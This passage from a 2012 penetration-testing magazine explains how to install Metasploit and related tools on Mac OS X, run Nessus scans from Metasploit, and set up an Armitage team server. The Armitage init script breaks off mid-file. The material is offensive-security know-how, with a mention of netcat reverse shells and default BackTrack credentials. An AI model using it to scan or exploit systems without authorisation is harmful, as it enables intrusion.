Configuring an IPv6 payload in Metasploit is essentially the same as an IPv4 payload, but there are a couple of minor differences. Obviously, you must specify an IPv6 address for your listener (or for the target, if using a bind payload), and if you use a link-local address on a host with multiple interfaces you must also specify the scope ID, i.e. the interface the address belongs to (fe80::1%eth0 rather than plain fe80::1), because a link-local address on its own does not say which link it is on.
Figure 12. Sending ping packets to Google over the IPv6 Internet using our new tunnel interface

Figure 13. Setting up an IPv6 payload in Metasploit

To summarize, let's take one last look at the scenario we've just discussed (Figure 14).

Conclusion 

For many out there, the mere sight of an IPv6 
address is enough to put them off learning more 
about the protocol. This is the biggest vulnerability 
in IPv6, and like most security vulnerabilities, it's 
a human problem. The protocol is being adopted 
in devices at a much quicker rate than people are 
willing to manage and configure it properly. 

For attackers, this provides great opportunities to 
jump on the unmanaged jumble and use it to build 
something that can be used to move around net- 
works in ways that the owners of those networks 
aren't expecting. 

For defenders, this means developing a whole 
new security model with emphasis on securing the 
endpoints rather than the perimeter. After all, IPv6 
doesn't hide behind NAT like its predecessor. 

By introducing IPv6 payloads and modules the 
Metasploit framework has given both groups new 
tools to better understand and manipulate the 
IPv6 protocol. Of course, we are only just getting 
started. The nature of the Metasploit community 
is to constantly build, innovate and improve upon 
what is already in place. These initial modules 
will act as a catalyst for further development in 
IPv6 enumeration and exploitation. Remember 
that the next time you run "msfupdate", and keep 
one eye open for new ways to use IPv6 for ex- 
ploitation. 



Figure 14. An overview of our IPv6-over-IPv4 tunnel set up 
How to Use The Mac OS X Hackers Toolbox

When you think of an operating system to run pen testing tools on, 
you probably think of Linux and more specifically BackTrack Linux. 
BackTrack Linux is a great option and one of the most common 
platforms for running pen testing tools. If you are a Mac user, then 
you would most likely run a virtual machine of BackTrack Linux. 



While this is a great option, sometimes it is nice to have your tools running on the native operating system of your computer. Another benefit is not having to share your system resources with a virtual machine. This also eliminates the need to transfer files between your operating system and a virtual machine, and the hassle of dealing with a virtual machine at all. Also, by running the tools within OS X you will be able to seamlessly access all of your Mac OS X applications.

My attack laptop happens to be a MacBook Pro and I started out running VirtualBox with a BackTrack Linux virtual machine. I recently started installing my hacking tools directly on the MacBook Pro. I wanted to expand the toolset of my Mac, so I started with Nessus, nmap, SQLMap, and then I installed Metasploit. My goal is to get most if not all of the tools I use installed on my MacBook Pro and run them natively within OS X. Since Mac OS X is a UNIX-based operating system, you get the great tools that come native with UNIX operating systems, such as netcat and SSH. You also have powerful scripting languages installed, such as Perl and Python. With all of the benefits and features of Mac OS X, there is no reason not to use it as your pen testing platform. I was really surprised not to see a lot of information on the subject of using Mac OS X as a pen testing/hacking platform. Metasploit was the toughest application to get running on Mac OS X, and that was mostly due to the PostgreSQL database setup. The majority of hacking tools are command line based, so they are easy and fairly straightforward to install.

In this article I am going to take you through in- 
stalling and configuring some of the most popu- 
lar and useful hacking tools such as Metasploit on 
Mac OS X. If you are interested in maximizing the 
use of your Mac for pen testing and running your 
tools natively, then you should find this article help- 
ful. 

The Tools

The pen test tools we will be installing are a must-have set, and all of them are free with the exception of Burp Suite and Nessus. Burp Suite does have a free version, which offers a portion of the Burp Suite tools at no cost. The tools offered for free with Burp Suite are useful and I highly recommend them. The professional version of Burp Suite is reasonably priced.

• Metasploit Framework 

• Nmap 

• SQLmap 

• Burp Suite 

• Nessus 

• SSLScan 

• Wireshark 

• TCPDUMP 

• Netcat 
Metasploit Framework
The Metasploit Framework is one of the most popular and powerful exploitation tools and a must-have for pen testers. It simplifies the exploitation process and allows you to manage your pen tests with the workspace function. Metasploit also allows you to run nmap from within Metasploit, with the scan information organized by project through the workspace function. You can create your own exploits and modify existing exploits in Metasploit. Metasploit has many more features, too many to mention here, and the scope of this article is to demonstrate how to install Metasploit and other pen testing tools.

The Install 

Before we install Metasploit, we need to install 
some software dependencies. It is a little more 
work to install Metasploit on Mac OS X, but it will 
be worth it. Listed below are the prerequisite soft- 
ware packages. 

Software Prerequisites

• MacPorts

• Ruby 1.9.3

• Homebrew

• PostgreSQL

MacPorts Installation
Install Xcode

• Install Xcode from the Apple App Store, or download it from https://developer.apple.com/xcode/

• Once Xcode is installed, go into the Xcode preferences and install the "Command Line Tools" (see Figure 1); MacPorts needs the compilers and headers they provide.

Figure 1. Install "Command Line Tools"



Install the MacPorts app

• Download and install the package (.dmg) file from the MacPorts web site: https://distfiles.macports.org/MacPorts/

Once the file is downloaded, install MacPorts. More information on MacPorts can be found here: http://www.macports.org/install.php

• Run MacPorts selfupdate to make sure it is using the latest version.

From a terminal window run the following command:

$ sudo port selfupdate

Ruby 1.9.3

Mac OS X comes with Ruby preinstalled, but we want to upgrade to Ruby 1.9.3.

• We will be using MacPorts to upgrade Ruby. From a terminal window run the following command:

$ sudo port install ruby19 +nosuffix

• The default install prefix for MacPorts is /opt/local/.

It's a good idea to verify that the PATH is correct, so that /opt/local/bin is listed before /usr/bin; otherwise the system Ruby in /usr/bin will still be picked up. You should get back something that looks like this:

/opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/usr/sbin:/sbin

You can verify the path by entering the following in a terminal window:

$ echo $PATH

To verify the Ruby install locations, enter:

$ which ruby gem

You should get back the following response:

/opt/local/bin/ruby
/opt/local/bin/gem

Database Installation 

A database is not required to run, but some of the 
features of Metasploit require that you install a data- 
base. The workspace feature of Metasploit is one of 
the really nice features of Metasploit that requires a 
database. Workspace allows easy project organiza- 
tion by offering separate workspaces for each proj- 
ect. PostgreSQL is the vendor recommended and 
supported database, but MySQL can be used. In 
this article, we will be using PostgreSQL. 

We will use Homebrew to install PostgreSQL. I tried a few different installation methods, but this is the easiest way. Homebrew is a good method for installing open source software packages.
• First we will install Homebrew.

From a terminal window run the following command (this is the 2012 installer location; the current one-line installer is published at http://brew.sh):

$ ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

• Next we will install PostgreSQL using Homebrew.

From a terminal window run the following command:

$ brew install postgresql

• Next we initialize the database cluster and start PostgreSQL.

From a terminal window run the following commands. The first creates the cluster. The cp and launchctl pair registers PostgreSQL with launchd so it starts at login (9.1.4 is the version Homebrew installed at the time of writing; use whatever version sits under /usr/local/Cellar/postgresql/). The pg_ctl line is the alternative if you would rather start the server by hand, so use one or the other: if launchd has already started it, pg_ctl will report that the server is already running.

$ initdb /usr/local/var/postgres
$ cp /usr/local/Cellar/postgresql/9.1.4/homebrew.mxcl.postgresql.plist ~/Library/LaunchAgents/
$ launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.postgresql.plist
$ pg_ctl -D /usr/local/var/postgres -l /usr/local/var/postgres/server.log start

• Database configuration

In this step we will create our Metasploit database and the database user.

• The Homebrew install does not create the postgres user; the account that ran initdb is the cluster superuser. We create a dedicated superuser role that can create databases and other roles ("password" is a placeholder, pick a real one):

At a command prompt, type the following and answer the prompts:

$ createuser postgres_user -P
Enter password for new role: password
Enter it again: password
Shall the new role be a superuser? (y/n) y

Answering y here is enough: a superuser can already create databases and roles, so createuser asks nothing further.

• Creating the database user

At a command prompt, type the following:

$ createuser msf_user -P
Enter password for new role: password
Enter it again: password
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

• Creating the database

At a command prompt, type the following:

$ createdb --owner=msf_user msf_database

• Install the pg gem, the PostgreSQL driver Metasploit uses. Make sure the gem that runs is the MacPorts one in /opt/local/bin, or the driver will end up with the system Ruby instead.

At a command prompt, type the following:

$ gem install pg

The database and database user are created, so 
now it is time to install Metasploit. 



Metasploit software installation

The dependencies have been installed and next we will install the Metasploit software.

• Download the Metasploit source code for installation using the link provided below; do not download the .run file from the Metasploit download page. Download the Metasploit tar file from: http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2

• Once the download is complete, untar the file. If you have software installed to unzip or untar files, it may untar the file automatically when the download finishes. I use StuffIt Expander and it untarred the file for me upon completion of the download. If you need to untar the file manually, type this command at the command line and it will untar the file into the desired directory:

$ sudo tar -xvf framework-latest.tar.bz2 -C /opt

If the file was untarred for you as mentioned, you will need to move the Metasploit source tree to the /opt directory. Your directory structure should look like this:

/opt/metasploit3/msf3

Starting Metasploit

Now that Metasploit is installed, we will start it for the first time. You will need to navigate to the Metasploit directory and start Metasploit.

• Navigate to the Metasploit directory with the following command:

$ cd /opt/metasploit3/msf3

• To start Metasploit, simply enter the following:

$ sudo ./msfconsole

sudo is not required to start msfconsole; it is only needed for modules that use raw sockets or privileged ports. If msfconsole fails to find the pg gem under sudo, check that sudo which ruby still resolves to /opt/local/bin/ruby.

You will get one of the many Metasploit screens like the one in Figure 2.



Figure 2. This is one of the many Metasploit screens you will see when launching Metasploit
Connecting to the database

In this next step we will connect Metasploit to our PostgreSQL database. From the Metasploit prompt, type the following:

msf > db_connect msf_user:password@127.0.0.1/msf_database

You will see the following message and you should be connected.

[*] Rebuilding the module cache in the background...

Type the following to verify the database is connected:

msf > db_status

You will get the following back, verifying the database is connected:

[*] postgresql connected to msf_database

The database is now connected to Metasploit, but once you exit Metasploit the database will be disconnected. To configure Metasploit to automatically connect on startup, we will have to create the msfconsole.rc file, which msfconsole executes at startup.

Enter the following at the command prompt:

$ cat > ~/.msf3/msfconsole.rc << EOF
db_connect -y /opt/metasploit3/config/database.yml
EOF

The -y option loads the connection parameters from a YAML file, so /opt/metasploit3/config/database.yml must exist and contain the same user, password, host and database name that worked above. If you have not written one, put the interactive form in the file instead:

$ cat > ~/.msf3/msfconsole.rc << EOF
db_connect msf_user:password@127.0.0.1/msf_database
EOF

Updating Metasploit

Now that we have Metasploit installed and configured, we will update the installation. From the Metasploit directory (/opt/metasploit3/msf3), type the following:

$ ./msfupdate

This can take a while, so just sit back and let the update complete. Make sure to update Metasploit frequently so you have the latest exploits.

The benefits of Metasploit with a database

Metasploit is installed, the database is connected and ready to use. So what can I do with Metasploit with a database that I couldn't do without one? Here is the list of Metasploit Database Backend Commands, taken directly from the Metasploit console: Listing 1.

The commands are pretty much self-explanatory, but it should be noted that db_import allows you to import nmap scans done outside of Metasploit. This comes in handy when you are working with others on a pen test and you want to centrally manage your pen test data. As mentioned earlier, workspace helps you manage your pen tests by allowing you to store them in separate areas of the database.

A great reference guide for Metasploit can be found at Offensive Security's website: http://www.offensive-security.com/metasploit-unleashed/Main_Page.

Nmap 

Nmap is an open source network discovery and 
security auditing tool. You can run nmap within 
Metasploit, but it is good to have nmap installed so 
you can run nmap outside of Metasploit. 



Listing 1. Database Backend Commands as displayed in the Metasploit console

Database Backend Commands

    Command            Description
    -------            -----------
    creds              List all credentials in the database
    db_connect         Connect to an existing database
    db_disconnect      Disconnect from the current database instance
    db_export          Export a file containing the contents of the database
    db_import          Import a scan result file (filetype will be auto-detected)
    db_nmap            Executes nmap and records the output automatically
    db_rebuild_cache   Rebuilds the database-stored module cache
    db_status          Show the current database status
    hosts              List all hosts in the database
    loot               List all loot in the database
    notes              List all notes in the database
    services           List all services in the database
    vulns              List all vulnerabilities in the database
    workspace          Switch between database workspaces
We will use Homebrew to install nmap. From the command prompt, type the following:

$ brew install nmap 

Visit the Nmap website for the Nmap reference 
guide: http://nmap.org/book/man.html. 

SQLmap

SQLmap is a penetration testing tool that detects and exploits SQL injection flaws. It is a Python script, so there is nothing to build; clone the development version from the command prompt:

$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

and run it with python sqlmap-dev/sqlmap.py.

Burp Suite 

Burp Suite is a set of web security testing tools, in- 
cluding Burp Proxy. To install Burp Suite, download 
it from: http://www.portswigger.net/burp/download. 
html 

To run Burp, type the following from the command prompt (the jar name matches the version you downloaded):

$ java -jar -Xmx1024m burpsuite_v1.4.01.jar

For more information on using Burp, go to the 
Burp Suite website: http://www.portswigger.net/ 
burp/help/ 

Nessus

Nessus is a commercial vulnerability scanner and it can be downloaded from the Tenable Network Security website: http://www.tenable.com/products/nessus/nessus-download-agreement.

Download the file Nessus-5.x.x.dmg.gz, and then double click on it to unzip it. Double click on the Nessus-5.x.x.dmg file, which will mount the disk image and make it appear under "Devices" in "Finder". Once the volume "Nessus 5" appears in "Finder", double click on the file Nessus 5.

The Nessus installer is GUI based like other Mac OS X applications, so there are no special instructions to document. The Nessus 5.0 Installation and Configuration Guide as well as the Nessus 5.0 User Guide can be downloaded from the documentation section of the Tenable website: http://www.tenable.com/products/nessus/documentation.

SSLScan 

SSLScan queries SSL services, such as HTTPS, 
in order to determine the ciphers that are support- 
ed. 



To install sslscan, type the following syntax at the 
command prompt: 

$ brew install sslscan 

Wireshark 

Wireshark is a packet analyzer and can be useful 
in pen tests. 

The Wireshark DMG package can be downloaded from the Wireshark website: http://www.wireshark.org/download.html.

Once the file is downloaded, double click to in- 
stall Wireshark. 

TCPDUMP 

TCPDUMP is a command line packet analyzer that 
is preinstalled on Mac OS X. For more information 
consult the man page for tcpdump, by typing the 
following syntax at the command prompt: 

$ man tcpdump 

Netcat 

Netcat is a multipurpose network utility that is pre- 
installed on Mac OS X. Netcat can be used for port 
redirection, tunneling, and port scanning to just 
name a few of the capabilities of netcat. Netcat is 
used a lot for reverse shells. For more information 
on netcat, type the following syntax at the com- 
mand prompt: 

$ man nc 

Conclusion 

If you follow the instructions in this article, you will have a fully functional set of hacking tools installed on your Mac, and you will be able to run them natively without having to start a virtual machine or deal with the added administrative overhead that comes with one. You will also not have to share resources with a virtual machine. I hope you found this article useful and that you enjoy setting up your Mac OS X hacker toolbox as much as I did. With Macs gaining popularity, I can only imagine they will become more widely used in pen testing.

Phillip Wylie

Phillip Wylie is a security consultant specializing in penetration testing, network vulnerability assessments and application vulnerability assessments. Phillip has over 8 years of experience in information security and 7 years of system administration experience.



Exploiting Software 09/2012

How to Scan with Nessus from within Metasploit

When you perform a penetration test with Metasploit you sometimes import vulnerability scanning results, for example from the Nessus Vulnerability Scanner. Usually you start the scan outside the Metasploit Framework and then import the results into Metasploit.



What you can do is to manage the Nessus 
scan from within Metasploit and easily 
import the results into your process. But 
let's start from the beginning. 

What you should know 

To get the most of this article you should have a 
working (and preferably updated) BackTrack 5 R3 
system, 32-bit or 64-bit shouldn't matter but I per- 
sonally run a 32-bit system in a virtual machine. 
This article makes extensive use of the command 
line so you should preferably be familiar with that. 

What you will learn 

After reading this article you should know how to 
run a Nessus scan both from the Nessus console 
and, more importantly, from within the Metasploit 
Framework. 

Installing Nessus on BackTrack 5 R3 

To run a Nessus vulnerability scan from the Metasploit console you first need to have a Nessus installation somewhere. Please refer to http://www.tenable.com/products/nessus/nessus-product-overview for download and installation instructions. I'll wait while you install it, and don't forget to register your installation so you can download the latest plugins for it.

Downloading

To download the Nessus vulnerability scanner go to http://www.nessus.org and download the Ubuntu 11.10 version for your architecture (32-bit or 64-bit); BackTrack 5 is Ubuntu based, so that package is the one that fits.

Installing

Install Nessus by running

32-bit

# dpkg --install Nessus-5.0.1-ubuntu1110_i386.deb

64-bit

# dpkg --install Nessus-5.0.1-ubuntu1110_amd64.deb



Figure 1. Registering Nessus
Configuring

First you need to register for a feed, which is how you get updated plugins, very much like an antivirus gets updated definitions. For home users there is a free personal feed, and for organizations and security professionals there is a professional feed which is very affordable (at the time of writing it is USD 1200 per year, which makes it USD 100 per month). If your organization can't afford that then you are in serious trouble.

Once you have your feed registration it is time to register Nessus (Figure 1):

# nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

Finally create a user for Nessus (Figure 2 and Listing 1).

Running Nessus 

Start Nessus by running 

# /etc/init.d/nessusd start 

You can access the Nessus console by going to https://<ip address>:8834/. You will be presented with a certificate warning because the SSL certificate is self-signed. Click through the warning message to access the console (generally not a good idea unless you know why you get the warning and the implications of it). 

Using Metasploit Framework and Nessus together 

Scanning the local network 

Let's scan the local network for vulnerable systems (Figure 3). 

After filling out the required information you can start the scan. Time to grab some coffee... Depending on the size of the target network the scan process can take anything from a few minutes to hours... (Figure 4). 

Once the scan is finished you can browse the report and download it so you can import it into Metasploit (Figure 5). 

Manually importing Nessus results into Metasploit 

Once you have a Nessus report you can download it in .nessus XML format (recommended) and import it using the db_import command: Listing 2. 

Listing 1. Create a user for Nessus 

# nessus-adduser 
Login: msf 
Password: 
Password (again): 

Do you want this user to be a Nessus 'admin' user? (can upload plugins, etc..) (y/n) [n]: y 





Figure 3. Scanning the local network for vulnerable systems 




Figure 2. Create a user for Nessus 



Figure 4. The span of time needed to scan with Nessus 
msf> db_import /path/to/report.nessus 

But that means that you need to run the scan first and then import it into Metasploit... 

Run Nessus from within Metasploit Framework 

A much cooler feature is to run the vulnerability 
scan directly from your Metasploit console, using 
the information you already collected about the tar- 
get network. 



Listing 2. Importing a Nessus report 

msf> db_import 

Usage: db_import <filename> [file2...] 
Filenames can be globs like *.xml, or **/*.xml which will search recursively 
Currently supported file types include 
    Acunetix XML 
    Amap Log 
    Amap Log -m 
    Appscan XML 
    Burp Session XML 
    Foundstone XML 
    IP360 ASPL 
    IP360 XML v3 
    Microsoft Baseline Security Analyzer 
    Nessus NBE 
    Nessus XML (v1 and v2) 
    NetSparker XML 
    NeXpose Simple XML 
    NeXpose XML Report 
    Nmap XML 
    OpenVAS Report 
    Qualys Asset XML 
    Qualys Scan XML 
    Retina XML 

Figure 5. Browsing and downloading the report 



Load Nessus plugin 

In Metasploit you start with loading the nessus plugin: 

msf> load nessus 

and then connect to the Nessus installation. 

Connect Metasploit to Nessus server 

The connection syntax is described in Listing 3: 

msf> nessus_connect user:password@localhost:8834 ok 

If you save the credentials using 

msf> nessus_save 

you only need to issue 

msf> nessus_connect 

to automatically connect to your Nessus instance. Be warned, your Nessus credentials are stored in the clear in ~/.msf4/nessus.yaml - but it saves on typing. 

Listing 3. Connecting Metasploit to Nessus server 

msf> nessus_connect -h 
[*] You must do this before any other commands. 
[*] Usage: 
[*] nessus_connect username:password@hostname:port <ssl ok> 
[*] Example:> nessus_connect msf:msf@192.168.1.10:8834 ok 
[*] OR 
[*] nessus_connect username@hostname:port <ssl ok> 
[*] Example:> nessus_connect msf@192.168.1.10:8834 ok 
[*] OR 
[*] nessus_connect hostname:port <ssl ok> 
[*] Example:> nessus_connect 192.168.1.10:8834 ok 
[*] OR 
[*] nessus_connect 
[*] Example:> nessus_connect 
[*] This only works after you have saved creds with nessus_save 
[*] username and password are the ones you use to login to the nessus web front end 
[*] hostname can be an ip address or a dns name of the web front end. 
[*] The "ok" on the end is important. It is a way of letting you 
[*] know that nessus used a self signed cert and the risk that presents. 

Configuring Nessus from Metasploit 

After you have connected to the Nessus scanner it is time to scan the target. First we need to select a policy: Listing 4. 

Listing 4. Selecting a policy 

msf> nessus_policy_list 
[+] Nessus Policy List 
[+] 
[+] ID  Name 
    -1  Web App Tests 
    -2  Internal Network Scan 
    -3  Prepare for PCI DSS audits 
    -4  External Network Scan 

Unfortunately, you can't create Nessus scan policies from the Metasploit plugin and you are forced to use the flash-based web GUI. This shouldn't be a big problem as creating policies is done far less often than performing vulnerability scans with them. 

Scan with Nessus from within Metasploit 

Then we need to start the scan (Listing 5): 

msf> nessus_scan_new -4 "Metasploit Scan" 192.168.1.0/24 

Listing 5. Starting the scan 

msf> nessus_scan_new -h 
[*] Usage: 
[*] nessus_scan_new <policy id> <scan name> <targets> 
[*] Example:> nessus_scan_new 1 "My Scan" 192.168.1.250 
[*] 
[*] Creates a scan based on a policy id and targets. 
[*] use nessus_policy_list to list all available policies 

Importing the Nessus results into Metasploit 

Once the scan is completed it is time to import the result into Metasploit (Listing 6). 

Listing 6. Importing the scan's results into Metasploit 

msf> nessus_report_list 
msf> nessus_report_get -h 
[*] Usage: 
[*] nessus_report_get <report id> 
[*] Example:> nessus_report_get f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca 
[*] 
[*] This command pulls the provided report from the nessus server in the nessusv2 format 
[*] and parses it the same way db_import_nessus does. After it is parsed it will be 
[*] available to commands such as db_hosts, db_vulns, db_services and db_autopwn. 
[*] Use: nessus_report_list to obtain a list of report id's 

msf> nessus_report_get f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca 

After which it is time to check what we now know about our target network using the "hosts", "services" and "vulns" commands in the Metasploit console. 
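The .nessus v2 report that db_import and nessus_report_get parse is plain XML, so you can check what Metasploit will end up showing under hosts, services and vulns before you import it. The following reader is an added example, not code from the article or from Metasploit; the embedded report, its host addresses and its plugin ids are constructed placeholders.

```python
"""Minimal reader for the Nessus v2 (.nessus) report format.

Added example: extracts the same three views Metasploit's db_import
exposes (hosts, services, vulns) from a report downloaded from the
Nessus console. The embedded report below is constructed for this
example; its plugin ids and hosts are placeholders, not real data.
"""
import xml.etree.ElementTree as ET
from collections import namedtuple

Service = namedtuple("Service", "host port proto name")
Vuln = namedtuple("Vuln", "host port proto severity plugin_id plugin_name")

# Severity codes as used in ReportItem/@severity of a .nessus v2 file
SEVERITY = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}

# Constructed sample report (placeholder hosts, plugin ids and names)
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
<Report name="Metasploit Scan">
  <ReportHost name="192.168.1.10">
    <HostProperties>
      <tag name="host-ip">192.168.1.10</tag>
      <tag name="operating-system">Linux Kernel 2.6</tag>
    </HostProperties>
    <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                pluginID="10000" pluginName="SSH Server Detection"/>
    <ReportItem port="80" svc_name="www" protocol="tcp" severity="3"
                pluginID="10001" pluginName="Outdated Web Server (placeholder)"/>
    <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                pluginID="10002" pluginName="OS Identification"/>
  </ReportHost>
  <ReportHost name="192.168.1.20">
    <HostProperties>
      <tag name="host-ip">192.168.1.20</tag>
      <tag name="operating-system">Microsoft Windows XP</tag>
    </HostProperties>
    <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                pluginID="10003" pluginName="SMB Remote Code Execution (placeholder)"/>
    <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="1"
                pluginID="10004" pluginName="SMB Signing Not Required"/>
  </ReportHost>
</Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return (hosts, services, vulns) from a .nessus v2 document.

    hosts:    dict ip -> operating-system string (None if Nessus did not say)
    services: sorted list of unique Service tuples; port 0 means "the host
              itself" in Nessus output and is not a service, so it is skipped
    vulns:    Vuln tuples for every ReportItem whose severity is above info
    """
    root = ET.fromstring(xml_text)
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a Nessus v2 report, root element is %s" % root.tag)
    hosts, services, vulns = {}, set(), []
    for rh in root.iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in rh.iter("tag")}
        ip = props.get("host-ip", rh.get("name"))
        hosts[ip] = props.get("operating-system")
        for item in rh.iter("ReportItem"):
            port = int(item.get("port", "0"))
            proto = item.get("protocol", "tcp")
            sev = int(item.get("severity", "0"))
            if port:
                services.add(Service(ip, port, proto, item.get("svc_name", "")))
            if sev > 0:
                vulns.append(Vuln(ip, port, proto, sev,
                                  item.get("pluginID"), item.get("pluginName")))
    return hosts, sorted(services), vulns


def vulns_at_least(vulns, level):
    """Keep only findings at or above a severity name such as "high"."""
    threshold = {name: code for code, name in SEVERITY.items()}[level]
    return [v for v in vulns if v.severity >= threshold]


if __name__ == "__main__":
    hosts, services, vulns = parse_nessus(SAMPLE_NESSUS)
    for ip, os_name in hosts.items():
        print("host    %-15s os=%s" % (ip, os_name))
    for s in services:
        print("service %-15s %5d/%s %s" % (s.host, s.port, s.proto, s.name))
    for v in vulns_at_least(vulns, "high"):
        print("vuln    %-15s %5d/%s %-8s %s"
              % (v.host, v.port, v.proto, SEVERITY[v.severity], v.plugin_name))
```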

Final thoughts 

Integrating Nessus vulnerability scan into 
Metasploit has several positive effects, like using 
Metasploit as the central repository for the current 
penetration test project and being able to share the 
information between team members when used 
in conjunction with Armitage (thus allowing multi- 
player Metasploit). 



MICHAEL BOMAN 

Michael Boman is a penetration tester by day and a malware researcher by night. Michael has more than 10 years experience in security testing of applications and infrastructure. He also delivers courses in security testing and secure development. Michael is passionate about computer security and doing his best so that more people do it right from the start. You can find him at his website http://michaelboman.org where he tries to share his experiences whenever he can. 
How to Use Multiplayer Metasploit with Armitage 



Metasploit is a very cool tool to use in your penetration testing: add 
Armitage for a really good time. Penetration test engagements are 
more and more often a collaborative effort with teams of talented 
security practitioners rather than a solo effort. 



Armitage is a scriptable red team (that is what 
the offensive security teams are called) col- 
laboration tool for Metasploit that visualiz- 
es targets, recommends exploits, and exposes the 
advanced post-exploitation features in the frame- 
work. 

Through one Metasploit/Armitage Server in- 
stance, your team can: 

• Use the same sessions 

• Share hosts, captured data, and downloaded 
files 

• Communicate through a shared event log (very similar to an IRC chat if you are familiar with those) 

• Run bots to automate red team tasks 

What you should know 

To get the most of this article you should have a 
working (and preferably updated) BackTrack 5 R3 
system, 32-bit or 64-bit shouldn't matter but I per- 
sonally run a 32-bit system in a virtual machine. 

This article makes extensive use of the com- 
mand line so you should preferably be familiar with 
that. You should also have a workstation that can 
run the Armitage java GUI, which either can be the 
BackTrack computer in X-windows or a separate 
computer running Linux, OSX or Windows which 
can reach the BackTrack machine via the network. 

Armitage's red team collaboration setup is CPU sensitive and it likes RAM. Make sure you give the virtual machine (or physical machine) running your BackTrack 5 R3 team server at least 1.5GB of RAM. 

What you will learn 

After reading this article you should know how to run an Armitage server and have several clients connected to it for multiplayer Metasploit, meaning running red teams with more than a single member on the same Metasploit server. 

Installation 

I will base this article on BackTrack 5 R3, so get 
that from http://www.backtrack-linux.org/. After 
you have downloaded and booted it you need to 
start with connecting it to the network and update 
Metasploit Framework. The default username/ 
password for BackTrack 5 is "root" / "toor"("root" 
spelled backwards). 

Update BackTrack and Metasploit 

Before we begin we should update BackTrack to 
get the latest fixes by running 

# apt-get update 

# apt-get dist-upgrade 

We should also update the Metasploit Framework 
by running 

# msfupdate 
www.hakin9.org/en 

Exploiting Software 

NETWORK SCANNING 

Listing 1b. Updating the Metasploit Framework 

#!/bin/sh
### BEGIN INIT INFO
# Provides:          armitage-teamserver
# Required-Start:
# Required-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Armitage TeamServer
# Description:       Armitage TeamServer for true Multiplayer Metasploit
### END INIT INFO

# Author: Michael Boman <michael@michaelboman.org>
#

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin
DESC="Armitage TeamServer"
NAME=teamserver
ARMITAGE_DIR=/opt/metasploit/msf3/data/armitage
DAEMON=$ARMITAGE_DIR/$NAME
# teamserver arguments: <ip address clients connect to> <shared password>
DAEMON_ARGS="172.16.109.130 MySecretPassword"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME

# Exit if the package is not installed
[ -x "$DAEMON" ] || exit 0

# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME

# Load the VERBOSE setting and other rcS variables
. /lib/init/vars.sh

# Define LSB log_* functions.
# Depend on lsb-base (>= 3.0-6) to ensure that this file is present.
. /lib/lsb/init-functions

#
# Function that starts the daemon/service
#
do_start()
{
    # Return
    #   0 if daemon has been started
    #   1 if daemon was already running
    #   2 if daemon could not be started
    start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --chdir $ARMITAGE_DIR --test > /dev/null \
        || return 1
    # teamserver stays in the foreground and writes no pidfile of its own,
    # so let start-stop-daemon detach it and record the pid for do_stop.
    start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --chdir $ARMITAGE_DIR \
        --background --make-pidfile -- $DAEMON_ARGS \
        || return 2
}

#
# Function that stops the daemon/service
#
do_stop()
{
    # Return
    #   0 if daemon has been stopped
    #   1 if daemon was already stopped
    #   2 if daemon could not be stopped
    #   other if a failure occurred
    start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME
    RETVAL="$?"
    [ "$RETVAL" = 2 ] && return 2
    # Wait for children to finish too if this is a daemon that forks
    # and if the daemon is only ever run from this initscript.
    # If the above conditions are not satisfied then add some other code
    # that waits for the process to drop all resources that could be
    # needed by services started subsequently.  A last resort is to
    # sleep for some time.
    start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON
    [ "$?" = 2 ] && return 2
    # Many daemons don't delete their pidfiles when they exit.
    rm -f $PIDFILE
    return "$RETVAL"
}

#
# Function that sends a SIGHUP to the daemon/service
#
do_reload() {
    #
    # If the daemon can reload its configuration without
    # restarting (for example, when it is sent a SIGHUP),
    # then implement that here.
    #
    start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME
    return 0
}

case "$1" in
  start)
    [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME"
    do_start
    case "$?" in
        0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
        2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
    esac
    ;;
  stop)
    [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
    do_stop
    case "$?" in
        0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
        2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
    esac
    ;;
  status)
    status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $?
    ;;
  #reload|force-reload)
    #
    # If do_reload() is not implemented then leave this commented out
    # and leave 'force-reload' as an alias for 'restart'.
    #
    #log_daemon_msg "Reloading $DESC" "$NAME"
    #do_reload
    #log_end_msg $?
    #;;
  restart|force-reload)
    #
    # If the "reload" option is implemented then remove the
    # 'force-reload' alias
    #
    log_daemon_msg "Restarting $DESC" "$NAME"
    do_stop
    case "$?" in
      0|1)
        do_start
        case "$?" in
            0) log_end_msg 0 ;;
            1) log_end_msg 1 ;; # Old process is still running
